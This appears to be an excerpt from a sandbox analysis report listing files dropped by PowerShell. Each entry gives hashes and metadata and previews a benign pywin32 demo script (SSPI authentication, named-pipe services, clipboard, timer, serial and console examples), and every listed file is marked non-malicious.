                                                                                                                                                                                                            Preview:"""A sample socket server and client using SSPI authentication and encryption.....You must run with either 'client' or 'server' as arguments. A server must be..running before a client can connect.....To use with Kerberos you should include in the client options..--target-spn=username, where 'username' is the user under which the server is..being run.....Running either the client or server as a different user can be informative...A command-line such as the following may be useful:..`runas /user:{user} {fqp}\\python.exe {fqp}\\socket_server.py --wait client|server`....{fqp} should specify the relevant fully-qualified path names.....To use 'runas' with Kerberos, the client program will need to..specify --target-spn with the username under which the *server* is running.....See the SSPI documentation for more details..."""....import http.client # sorry, this demo needs 2.3+..import optparse..import socketserver..import struct..import traceback....import sspi..import win32api..import win32
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1164
                                                                                                                                                                                                            Entropy (8bit):4.791579605564788
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:JhbRTxPCLckLewld3svWJWEoTpiulT9d/NysPDk6ARR:JfxPIczAdwYeTE09d/NykD1AP
                                                                                                                                                                                                            MD5:FDF0D3A6D98CCB16E3C6ABD38B3208EF
                                                                                                                                                                                                            SHA1:87B0E5AA4D6D3BC79761E818F04CE87E8FD12BC6
                                                                                                                                                                                                            SHA-256:91C6D0676B752A9455BAC1CEAADC508A8F9E6E1372B9EFB56B1825FBDFDAA1C8
                                                                                                                                                                                                            SHA-512:95A1FE74EAA6296FD9FDE32890132D2E7EEB926E29AF70ADCDA3C3F24BAD4C237AB02F09E931CA42928865F14C5340AE4947D00C9D49777DF00E7DAA3C7DA01B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# Demonstrates how to validate a password...# See also MSKB article Q180548..#..# To use with Kerberos you need to jump through the 'targetspn' hoops.....import sys....import win32security..from sspi import ClientAuth, ServerAuth......def validate(username, password, domain=""):.. auth_info = username, domain, password.. ca = ClientAuth("NTLM", auth_info=auth_info).. sa = ServerAuth("NTLM").... data = err = None.. while err != 0:.. err, data = ca.authorize(data).. err, data = sa.authorize(data).. # If we get here without exception, we worked!......if __name__ == "__main__":.. if len(sys.argv) not in [2, 3, 4]:.. print(f"Usage: {__file__} username [password [domain]]").. sys.exit(1).... # password and domain are optional!.. password = None.. if len(sys.argv) >= 3:.. password = sys.argv[2].. domain = "".. if len(sys.argv) >= 4:.. domain = sys.argv[3].. try:.. validate(sys.argv[1], password, domain)..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1478
                                                                                                                                                                                                            Entropy (8bit):5.383333071236561
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:Ci5Am4fHNDYJepHrPjjPdAc2slnqf8wQorLj2fAK38D+St+U4+I+Y3A:CIAmoNcJmrPHdT2slW8PorLj2fAKn1w
                                                                                                                                                                                                            MD5:0C76DABC5D1E400F8297E02A70DC0DBC
                                                                                                                                                                                                            SHA1:D2B51A4A6FBE33121325AE79C8CD6AA5BC73F7F6
                                                                                                                                                                                                            SHA-256:8DAABB16548370FCF1F27A5C18E5F5A012420B6A0C5DE1BE8E52C7CDDC8CE423
                                                                                                                                                                                                            SHA-512:A59A4B7BA64669F5A96D9AF11E26FC9860FEED860C02467A358C22BCAA1282DF0321EF69D274D28A4CE927FFD8FD0B38A54646EADFE360950AE2AC7F5ABC721B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...G.d.d...d.e...Z.d.d...Z.e.d.k.rHz.e.....W.d.S...e.e.f.y6..............e.d.....d.d.l.Z.e.......Y.d.S.d.S.)......N)...TestPipeServicec....................@...s8...e.Z.d.Z.d.Z.d.Z.d.Z.e.j.Z.d.e.j...e.j.d.......d...Z.d.S.)...NativeTestPipeServiceZ.PyNativePipeTestServicez.Python Native Pipe Test Servicez Tests Python.exe hosted services.."r....N)...__name__..__module__..__qualname__Z._svc_name_Z._svc_display_name_Z._svc_description_..sys..executableZ._exe_name_..os..path..abspath..argvZ._exe_args_..r....r......C:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\win32/Demos/service/nativePipeTestService.pyr........s................r....c....................C...sb...t.t.j...d.k.r*t.d.....t.d.....d.d.l.}.t.d.....t.......t...t.....t.......t.d.....d.S.t...t.....d.S.).N.....z.service is starting...z?(execute this script with '--help' if that isn't what you want)r....z.service
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4471
                                                                                                                                                                                                            Entropy (8bit):5.650664204623392
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:Cdw2wuMGJFZexTgoni0HQACCsdyp3h+LLcyCnFk1Y4Cancm+KrCD2psh:CdwSyxTLi0HVCCsdyp3h+vcyCnKvCSru
                                                                                                                                                                                                            MD5:A4866078E5D2BD80B8872C2BF5D9729F
                                                                                                                                                                                                            SHA1:D9ECB7B49854BF40D4A65E83D621A25353E4D8A5
                                                                                                                                                                                                            SHA-256:9FF58BFF94F97C530C7B706E992ED6198006F9C2843142EEF04DBAEC86BB4F72
                                                                                                                                                                                                            SHA-512:0C8509FDC2C9B5137858ACC15827203C6C66B214E39F4B1399F60AF42A2CD16086F4159DF636B6681BCA2EF583AE8F483E1C5304F98D24931241EB06FF9BB495
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g_........................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.T.d.d.l.T.d.d.l.T.d.d.l.T.d.d.l.T.d.d...Z.G.d.d...d.e.j...Z.e.d.k.rLe...e.....d.S.d.S.)......N)...*c....................C...s ...z.|.|...W.S...t.y.......Y.d.S.w...N)...error)...fn..args..r.....zC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\win32/Demos/service/pipeTestService.py..ApplyIgnoreError!...s..............r....c....................@...sH...e.Z.d.Z.d.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.)...TestPipeServiceZ.PyPipeTestServicez.Python Pipe Test ServicezRTests Python service framework by receiving and echoing messages over a named pipec....................C...sD...t.j...|.|.....t.d.d.d.d...|._.t.....|._.t.d.d.d.d...|.j._.g.|._.d.S...Nr....)...win32serviceutil..ServiceFramework..__init__..CreateEvent..hWaitStop..pywintypesZ.OVERLAPPED..overlapped..hEvent..thread_handles)...selfr....r....r....r....r....-...s
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3668
                                                                                                                                                                                                            Entropy (8bit):5.275958096500723
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:CFURiRk1v2uziclBfqhDO8MjAlGuX0h3DmYTmdsoNm1G7Q:CF3Wjso8MjyGuX0h3iYTmdswm1d
                                                                                                                                                                                                            MD5:5CDB7AB466C0F56EB53764C8E5A77ADE
                                                                                                                                                                                                            SHA1:5289730A9011415653786E335C00BE8EBDAEE366
                                                                                                                                                                                                            SHA-256:718DD01EC539C96F44EF790A989A24FCE70106ADAF2CC57EF885755A7C4445D0
                                                                                                                                                                                                            SHA-512:A2B1852BDBE01D1BE8B1FAA55EE10A3E346C7392EAB419D73F4D40BD9B1B3790607FB2C98565DC736D34FC1E1E4341BD0969853234F03E0A24336002686E791C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.T.d.d.l.T.d.d.l.T.d.a.d.d...Z.d.d...Z.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e.d.k.rHe.....d.S.d.S.)......N)...*c....................C...sj...d.}.d.}.|.d.k.r1|.d.7.}.z.|.|...W.S...t.j.y0..}...z.|.j.t.j.k.r+t...d.....W.Y.d.}.~.q...d.}.~.w.w.t.d.....).Nr..............i....z)Could not make a connection to the server)...win32api..error..winerror..ERROR_PIPE_BUSYZ.Sleep..RuntimeError)...fn..args..retZ.retryCount..exc..r......C:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\win32/Demos/service/pipeTestServiceClient.py..CallPipe%...s................................r....c....................C...s@...t.r.t.d.|.....t.t.d.|...|.d.t.f...}.t.r.t.d.|.......t.d.....d.S.).NZ.Sending..\\%s\pipe\PyPipeTest.....z.Server sent back '%s'z.Sent and received a message!)...verbose..printr......CallNamedPipe..NMPWAIT_WAIT_FOREVER)...server..msg..datar....r....r......testClient6...s..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2890
                                                                                                                                                                                                            Entropy (8bit):5.733544442610338
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:CYg/GW15c0kMudZqc16Flg2FCkdUyT+aGee3gZZ1ZMecIQmBDaoWawv7v/z0ly:CYsGWrvh4AcMF/CkC5atewbDc9gaovFU
                                                                                                                                                                                                            MD5:120A25CC0B29B73FA8DFE779ECDA7049
                                                                                                                                                                                                            SHA1:524B08B5A4F4646BEC6B083CF7B5A3EC35CB14C8
                                                                                                                                                                                                            SHA-256:E6D975E9174F2346D5499B9A8D455C35E934A80F0CEE9B408D994D1B9A324EAC
                                                                                                                                                                                                            SHA-512:B5BBE1D0F4C7F145C2A4D561BB1E030D6B8A046285E9C85DF40D6C9A1BA0B6DDFF8815A9E023133984EE7C921DFE220BEEAAF1A53A0DDC9CCD14D50452AEEF42
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g=........................@...sh...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.Z.G.d.d...d.e.j...Z.e.d.k.r2e...e.....d.S.d.S.)......Nz&{A5DCBF10-6530-11D2-901F-00C04FB951ED}c....................@...s@...e.Z.d.Z.d.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.)...EventDemoServiceZ.PyServiceEventDemoz.Python Service Event DemozNDemonstrates a Python service which takes advantage of the extra notificationsc....................C...sB...t.j...|.|.....t...d.d.d.d...|._.t...t...}.t...|.j.|.t.j...|._.d.S.).Nr....)...win32serviceutil..ServiceFramework..__init__..win32event..CreateEvent..hWaitStop..win32gui_structZ!PackDEV_BROADCAST_DEVICEINTERFACE..GUID_DEVINTERFACE_USB_DEVICE..win32guiZ.RegisterDeviceNotification..ssh..win32conZ.DEVICE_NOTIFY_SERVICE_HANDLEZ.hdn)...self..args..filter..r.....xC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\win32/Demos/service/serviceEvents.pyr........s....................z.EventDemoService.__i
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2198
                                                                                                                                                                                                            Entropy (8bit):4.619086257707703
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:Aw9BIhOmG6EGBAM0qicPFn7wnukcyaGa/4dGdq1o8b:Aw9BWOmGtGdT97auH/a1o8b
                                                                                                                                                                                                            MD5:A2CF100F56ECF1F8E1826493C7C300C1
                                                                                                                                                                                                            SHA1:7487D5905F245223A51BF40C063B3ED8057A7F05
                                                                                                                                                                                                            SHA-256:5B1CE3552935392A699D2CD19D6AE4D9A6A38E8D2130A1CA316B44F54701339C
                                                                                                                                                                                                            SHA-512:393D634E0EFE577C2D9D8B2223CADD0F9D6CDCC93551B5C8726DDE3C736E1F9DFF1998491CC98CF953DCEA501C6DD2B2A641CE76F4E7735602C90203500081D0
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# This is an example of a service hosted by python.exe rather than..# pythonservice.exe.....# Note that it is very rare that using python.exe is a better option..# than the default pythonservice.exe - the latter has better error handling..# so that if Python itself can't be initialized or there are very early..# import errors, you will get error details written to the event log. When..# using python.exe instead, you are forced to wait for the interpreter startup..# and imports to succeed before you are able to effectively setup your own..# error handling.....# So in short, please make sure you *really* want to do this, otherwise just..# stick with the default.....import os..import sys....import servicemanager..import win32serviceutil..from pipeTestService import TestPipeService......class NativeTestPipeService(TestPipeService):.. _svc_name_ = "PyNativePipeTestService".. _svc_display_name_ = "Python Native Pipe Test Service".. _svc_description_ = "Tests Python.exe hosted servi
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7007
                                                                                                                                                                                                            Entropy (8bit):4.637254404561482
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:xA7V+IQeXowzGe6PfJeCFJDAB1dDJhPBe5B9M5848i29VUwfv2jER39QilqN:xkCeCFJDe1dDJxBe79YJeVUwU0ii0N
                                                                                                                                                                                                            MD5:2655AF7E42A4D9E286371B58145E9E61
                                                                                                                                                                                                            SHA1:30F6735BDFAF97F5C8B849CB4258D105ED0931D6
                                                                                                                                                                                                            SHA-256:89F92A12183B434BCBD56C8F54DF9F7EEBFCD133A23DBCE4A6D5416C7DA5D451
                                                                                                                                                                                                            SHA-512:6B188268BC9205D0CA1D5B71771BF56F3F4677CC749F4803C32B27F846C4712BD42D23DC0EC638FCBC09418FD83003A04FFFAF09ED7C4333BE124991075D9F75
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# A Demo of services and named pipes.....# A multi-threaded service that simply echos back its input.....# * Install as a service using "pipeTestService.py install"..# * Use Control Panel to change the user name of the service..# to a real user name (ie, NOT the SystemAccount)..# * Start the service...# * Run the "pipeTestServiceClient.py" program as the client pipe side.....import _thread..import traceback....# Old versions of the service framework would not let you import this..# module at the top-level. Now you can, and can check 'Debugging()' and..# 'RunningAsService()' to check your context...import pywintypes..import servicemanager..import win32con..import win32service..import win32serviceutil..import winerror..from ntsecuritycon import *..from win32api import *....# Use "import *" to keep this looking as much as a "normal" service..# as possible. Real code shouldn't do this...from win32event import *..from win32file import *..from win32pipe import *......def ApplyIgnoreError
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4609
                                                                                                                                                                                                            Entropy (8bit):4.546818870138895
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:yAN5QeSAUAjz5MUdI1pom/CNQ8umgSeUS2m+e01t8+87u9y:yANkTuMJlpAg/Udug8u9y
                                                                                                                                                                                                            MD5:730CE9A246A864B3D5E83B0F4EC292E0
                                                                                                                                                                                                            SHA1:68ACD0465D3C34057FBA80E08C0CD3238BF14A91
                                                                                                                                                                                                            SHA-256:E91D29151D3F5D5BC240D17F5A7357A38F9757B379FAEA6FFE56D0E569636D26
                                                                                                                                                                                                            SHA-512:6A61478103982831A1AA49560A2FF9147F035BEA40E2F1AEA92E7D0ED76D10DEDF74FF71741C437E495F2238702A5A6CE86B2FB560A74102519F76837F888EDB
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# A Test Program for pipeTestService.py..#..# Install and start the Pipe Test service, then run this test..# either from the same machine, or from another using the "-s" param...#..# Eg: pipeTestServiceClient.py -s server_name Hi There..# Should work.....import os..import sys..import traceback....import pywintypes..import win32api..import winerror..from win32event import *..from win32file import *..from win32pipe import *....verbose = 0....# def ReadFromPipe(pipeName):..# Could (Should?) use CallNamedPipe, but this technique allows variable size..# messages (whereas you must supply a buffer size for CallNamedPipe!..# hPipe = CreateFile(pipeName, GENERIC_WRITE, 0, None, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0)..# more = 1..# while more:..# hr = ReadFile(hPipe, 256)..# if hr==0:..# more = 0..# except win32api.error (hr, fn, desc):..# if hr==winerror.ERROR_MORE_DATA:..#
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4157
                                                                                                                                                                                                            Entropy (8bit):4.968545890765815
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:VGFeoTzP9lVf2AlTctcbP4b9hWXcww3PMQwG3isfU72g3c0tQ9EqT+BM:YJTzthStmPg9ocF3pzjUKg3c0taBIM
                                                                                                                                                                                                            MD5:F30572C65F8D01B0E88A54869668F945
                                                                                                                                                                                                            SHA1:66FAD175E0FCFABADED9BBC870D95343C28DDB3D
                                                                                                                                                                                                            SHA-256:B96253BD293AAB8B6FFA8101523AD7292BD78E376E6B3ACDD232A3E0AAA3BE4B
                                                                                                                                                                                                            SHA-512:41B7A2F676A408BF635808AC8F61D5585D4551EDB1E9D719CA639FCC8CE004B8C718EE4A58F89D224FF38867C68780FD64DC727A85BC4BE86D364E2D3AF415B7
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# A Demo of a service that takes advantage of the additional notifications..# available in later Windows versions.....# Note that all output is written as event log entries - so you must install..# and start the service, then look at the event log for messages as events..# are generated.....# Events are generated for USB device insertion and removal, power state..# changes and hardware profile events - so try putting your computer to..# sleep and waking it, inserting a memory stick, etc then check the event log....# Most event notification support lives around win32gui..import servicemanager..import win32con..import win32event..import win32gui..import win32gui_struct..import win32service..import win32serviceutil....GUID_DEVINTERFACE_USB_DEVICE = "{A5DCBF10-6530-11D2-901F-00C04FB951ED}"......class EventDemoService(win32serviceutil.ServiceFramework):.. _svc_name_ = "PyServiceEventDemo".. _svc_display_name_ = "Python Service Event Demo".. _svc_description_ = (.. "Demonstra
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2257
                                                                                                                                                                                                            Entropy (8bit):4.5805011745020705
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:xxcO98y2JS7y+V3KMZozBO5CSXTPk/HB6eVRGO0KNWWaPhS7mJY:zcA8Y7y+9jazBO5BPkM4R/0IuPh7JY
                                                                                                                                                                                                            MD5:9497998660F8C41435A4386A23F275EC
                                                                                                                                                                                                            SHA1:7AB5C5854583669C3B84EC3B3161C8F62F1D037F
                                                                                                                                                                                                            SHA-256:7E0645D250E00C3746DACE89ECA35B2AB513EC970EF7140ADF0F8A3D08E6F4ED
                                                                                                                                                                                                            SHA-512:6497C477CCB417FC96D9C7751DFF4DF4B15680C04346888EEB0B8C24950A45D37F99450B266E5A6FF397856F3158F89EFB6CBA06B083F8394CFA251480093976
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# -*- Mode: Python; tab-width: 4 -*-..#....# This module, and the timer.pyd core timer support, were written by..# Sam Rushing (rushing@nightmare.com)....import time....# Timers are based on Windows messages. So we need..# to do the event-loop thing!..import timer..import win32event..import win32gui....# glork holds a simple counter for us.......class glork:.. def __init__(self, delay=1000, max=10):.. self.x = 0.. self.max = max.. self.id = timer.set_timer(delay, self.increment).. # Could use the threading module, but this is.. # a win32 extension test after all! :-).. self.event = win32event.CreateEvent(None, 0, 0, None).... def increment(self, id, time):.. print("x = %d" % self.x).. self.x += 1.. # if we've reached the max count,.. # kill off the timer... if self.x > self.max:.. # we could have used 'self.id' here, too.. timer.kill_timer(id).. win32event.SetEvent(self.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4742
                                                                                                                                                                                                            Entropy (8bit):4.739683579139019
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:OzDAPBQf43NQN2XJjvJn2SjqjiLbcfnXaxF7muNQXnf/q02un76W:Onf4iNOJjvJn9jqjiLbcfn0mXHP1r
                                                                                                                                                                                                            MD5:D5705A2B9E30CD6229E98111647A0183
                                                                                                                                                                                                            SHA1:82B4C7B38ACC4E5F6F4FAA3A20498B0099EEC442
                                                                                                                                                                                                            SHA-256:607D6721D2AA8A41F66EAA780C7E31B6C499D49A12C12128525B54F9CF410B04
                                                                                                                                                                                                            SHA-512:91A83A137C7B3D7C436BD20CF6505CB18170C694E292EDE1DB2B3A2D9A9F15E860609928F98CE99B46E94B49F8AEEDF16644EFD37D9889898620BC7693970737
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# win32clipboardDemo.py..#..# Demo/test of the win32clipboard module...import win32con..from win32clipboard import *....if not __debug__:.. print("WARNING: The test code in this module uses assert").. print("This instance of Python has asserts disabled, so many tests will be skipped")....cf_names = {}..# Build map of CF_* constants to names...for name, val in list(win32con.__dict__.items()):.. if name[:3] == "CF_" and name != "CF_SCREENFONTS": # CF_SCREEN_FONTS==CF_TEXT!?!?.. cf_names[val] = name......def TestEmptyClipboard():.. OpenClipboard().. try:.. EmptyClipboard().. assert (.. EnumClipboardFormats(0) == 0.. ), "Clipboard formats were available after emptying it!".. finally:.. CloseClipboard()......def TestText():.. OpenClipboard().. try:.. text = "Hello from Python".. text_bytes = text.encode("latin1").. SetClipboardText(text).. got = GetClipboardData(win32con.CF_TEXT).. # CF
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4022
                                                                                                                                                                                                            Entropy (8bit):4.458117132860525
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:E6GXS2f/cuqB7qVFqsIETpP7QaFm+NbP8cvtGCc2TyaS+6sRf5pu:fwS2f3qNq2aQOm+FPxo2NRf5Q
                                                                                                                                                                                                            MD5:4BFCB34C018DAC335321ABACBE86A954
                                                                                                                                                                                                            SHA1:A1DEB6242049650747B4772C86FC5F247CB74A81
                                                                                                                                                                                                            SHA-256:573365782929B7006F424E2725449AE7BA2B33ABE8A4C85CD2D5C63266C36FA1
                                                                                                                                                                                                            SHA-512:CD763103E2BC9A6EE6DA520CC8FB71E7C2B5DC108C8A4E3AC5E545C4A40332A3DBA2301271E55DE6592AE3BABD877E2D4C4888308E1B744C8BAE574AA3BCD24B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import win32api..import win32clipboard..import win32con..import win32gui......class ViewerWindow:.. def __init__(self):.. self.hwndNextViewer = None.... def OnPaint(self, hwnd, msg, wp, lp):.. dc, ps = win32gui.BeginPaint(hwnd).. wndrect = win32gui.GetClientRect(hwnd).. wndwidth = wndrect[2] - wndrect[0].. wndheight = wndrect[3] - wndrect[1].. win32clipboard.OpenClipboard().. try:.. try:.. hbitmap = win32clipboard.GetClipboardData(win32clipboard.CF_BITMAP).. except TypeError:.. font = win32gui.LOGFONT().. font.lfHeight = 15 # int(wndheight/20).. font.lfWidth = 15 # font.lfHeight.. # font.lfWeight=150.. hf = win32gui.CreateFontIndirect(font).. win32gui.SelectObject(dc, hf).. win32gui.SetBkMode(dc, win32con.TRANSPARENT).. win32gui.SetTextColor(dc, win32api.RGB(0, 0,
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5675
                                                                                                                                                                                                            Entropy (8bit):4.620946699203402
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:LAN8dwGu6zbDK3hRfSk1KOpbs52RriSMmyGDLVUKXZ5xJ:Lmw7K33D1Hhe2RriS5yiDp5
                                                                                                                                                                                                            MD5:328679F985B095AD618DEDCD0F107C2E
                                                                                                                                                                                                            SHA1:2859D23FB74FF8AC742382C50C82EBB411E89E4B
                                                                                                                                                                                                            SHA-256:A96B1CC46D3522B7F7E396668D425AF4DD97ABFBE7A4A2613AB2512B367B97A6
                                                                                                                                                                                                            SHA-512:1FE8F6798AFA3C434D057B64ED3452FF032682BC0EC953BFC93746579C43EAA813775D1187B566F25698E535763068E95A984C0D489F14F17F487FD265288706
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# This is a simple serial port terminal demo...#..# Its primary purpose is to demonstrate the native serial port access offered via..# win32file.....# It uses 3 threads:..# - The main thread, which cranks up the other 2 threads, then simply waits for them to exit...# - The user-input thread - blocks waiting for a keyboard character, and when found sends it..# out the COM port. If the character is Ctrl+C, it stops, signalling the COM port thread to stop...# - The COM port thread is simply listening for input on the COM port, and prints it to the screen.....# This demo uses userlapped IO, so that none of the read or write operations actually block (however,..# in this sample, the very next thing we do _is_ block - so it shows off the concepts even though it..# doesn't exploit them.....import msvcrt # For the getch() function...import sys..import threading....import win32con # constants...from win32event import * # We use events and the WaitFor[Multiple]Objects functions...from win3
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5244
                                                                                                                                                                                                            Entropy (8bit):4.792691036445527
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:LRy5F8F0ISCfMPhNMyF8FU3tFIF5EA/l2F/wFXFNFTF/55FQFZF0F0:dy5avMPhKyaS9ub/0adLJNSPOO
                                                                                                                                                                                                            MD5:15A5EA5E6F61A308FD3647ADDE1E9EE0
                                                                                                                                                                                                            SHA1:4C9626AA3984CC60678B1820326831AFFDE603C4
                                                                                                                                                                                                            SHA-256:F1DC138097A58D83FA6377A8AC5584C6952CD2F1A6BFE50B62A4E6B238519E32
                                                                                                                                                                                                            SHA-512:614B1FE7BA98B5759F0EC488112F1A6F115622A236E0DC14415A2BB732F29BFEC610C173956B3ACDEE022C8A3757628B05089E2127D1F6457F696B851066810D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import time....import win32con..import win32console....virtual_keys = {}..for k, v in list(win32con.__dict__.items()):.. if k.startswith("VK_"):.. virtual_keys[v] = k....free_console = True..try:.. win32console.AllocConsole()..except win32console.error as exc:.. if exc.winerror != 5:.. raise.. ## only free console if one was created successfully.. free_console = False....stdout = win32console.GetStdHandle(win32console.STD_OUTPUT_HANDLE)..stdin = win32console.GetStdHandle(win32console.STD_INPUT_HANDLE)..newbuffer = win32console.CreateConsoleScreenBuffer()..newbuffer.SetConsoleActiveScreenBuffer()..newbuffer.SetConsoleTextAttribute(.. win32console.FOREGROUND_RED.. | win32console.FOREGROUND_INTENSITY.. | win32console.BACKGROUND_GREEN.. | win32console.BACKGROUND_INTENSITY..)..newbuffer.WriteConsole("This is a new screen buffer\n")....## test setting screen buffer and window size..## screen buffer size cannot be smaller than window size..window_size
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2834
                                                                                                                                                                                                            Entropy (8bit):5.125990653905428
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:653DDPWh+2Ke5bte5RXBe/ddoQ4le4AewWeiVewLe812kmacXjrymFgXqhpy8kub:KvwzK2tFoQilADW9VewLl1PnczW+gXar
                                                                                                                                                                                                            MD5:AC54E5A24DAC0CD039622A2138E61AC9
                                                                                                                                                                                                            SHA1:868859CDE128FDACEF895AAD1969B30F90A70DE6
                                                                                                                                                                                                            SHA-256:BF26ED648AA62263E0CB2CD2F7A805BE0C6982544DFA5FF56CE674FD8DE0692A
